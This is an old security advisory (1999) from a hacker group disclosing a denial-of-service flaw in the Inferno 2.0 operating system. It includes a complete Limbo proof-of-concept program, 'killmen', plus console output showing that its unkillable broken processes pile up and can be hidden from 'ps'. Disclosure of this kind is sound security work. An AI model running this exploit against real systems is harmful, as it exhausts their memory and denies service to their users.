- J.J.F. / Hackers Team - Security Advisory
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Date: 1/18/1999
Author: Conde Vampiro
URL: http://www.jjf.org
Aplication:
Operating System: Inferno 2.0 over Windows platform.
(It may also affect all other
platforms running Inferno.)
Danger: A user can produce a DoS (Denial of Service) in
its own memory.
-=-=-=-=-=-=-=-=
Introduction
-=-=-=-=-=-=-=-=
A program written in Limbo can produce a denial of service
consuming all the memory of the computer. Althrough the Inferno's
commands to prevent this DoS are not able to stop this attack.
-=-=-=-=-=-=-=-=
In Detail
-=-=-=-=-=-=-=-=
Using the following program written in Limbo, we can consume all the
memory of the platform we are running Inferno.
------------ Source Code ---------------------------------------------------
#
# FILE: killmen.b
# DATE: 11/10/98
# CODER: Conde Vampiro of - J.J.F. / Hackers Team -
# ABSTRACT: A DoS (Denial of service) in Limbo for Inferno O.S
#
# http://www.jjf.org - J.J.F. / Hackers Team -
implement killmen;
include "sys.m";
sys: Sys;
include "draw.m";
i : int;
men : con "DoS by Conde Vampiro";
died := array[0] of int;
kill := array[0] of int;
killmen: module {
init: fn(ctxt: ref Draw-> Context, nil: list of string);
};
init (ctxt: ref Draw-> Context, nil: list of string) {
sys = load Sys Sys->PATH;
sys->print("%s\n\n", men);
for (i:=0;i<100;i++) {
died[i]=kill[i];
}
}
------------ EOF -------------------------------------------------------------
If a user execute this program on an Inferno console, it will
produce the following error:
colmillo$ killmen
DoS by Conde Vampiro
[killmen] Broken: "array bounds error"
17 "killmen":array bounds error
colmillo$
We can observe that the program "killmen" has produce an error and
the shell tells us it's pid, in this case 17. If we execute the 'ps'
command, it will show the following result:
colmillo$ ps
1 1 Conde Vampiro release 1K Sh[$Sys]
6 6 inferno alt 19K Wm
7 6 inferno release 4K Wm[$Sys]
8 6 inferno release 4K Wm[$Sys]
11 10 inferno recv 16K Plumb
12 10 inferno alt 16K Plumb
13 10 inferno alt 16K Plumb
17 1 Conde Vampiro broken 10K killmen
18 1 Conde Vampiro ready 1K Ps[$Sys]
colmillo$
The program "killmen" it's still remainning in memory, althrough it
has produce an error. If we execute this program for a while, it will
consume all the memory, this can be easely done using Mash, the shell
script of Inferno.
If the administrator has not execute the Inferno window interface
or has not done the bind of the 'ps' command to the /prog directory, the
"killmen" program will be hidden and the 'ps' will not show the processes
in memory, but they are there.
The 'slayer' command is used to kill "broken" processes but it will
not kill "killmen". If we go to /prog directory we can see all the processes
as files:
colmillo$ cd /prog
colmillo$ ls -l
dr-xr-xr-x p 0 Conde Vampiro Conde Vampiro 0 Jan 18 17:53 1
dr-xr-xr-x p 0 inferno Conde Vampiro 0 Jan 18 17:53 11
dr-xr-xr-x p 0 inferno Conde Vampiro 0 Jan 18 17:53 12
dr-xr-xr-x p 0 inferno Conde Vampiro 0 Jan 18 17:53 13
dr-xr-xr-x p 0 Conde Vampiro Conde Vampiro 0 Jan 18 17:53 17
dr-xr-xr-x p 0 Conde Vampiro Conde Vampiro 0 Jan 18 17:53 22
dr-xr-xr-x p 0 inferno Conde Vampiro 0 Jan 18 17:53 6
dr-xr-xr-x p 0 inferno Conde Vampiro 0 Jan 18 17:53 7
dr-xr-xr-x p 0 inferno Conde Vampiro 0 Jan 18 17:53 8
colmillo$
The 17 and 22 processes are the "killmen" program that are in memory
and every time the program is executed it will create a new "broken" process
in memory.
-=-=-=-=-=-=-=-=
Byes All
conde@jjf.org
http://www.jjf.org
- J.J.F. / Hackers Team - Security Advisory
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=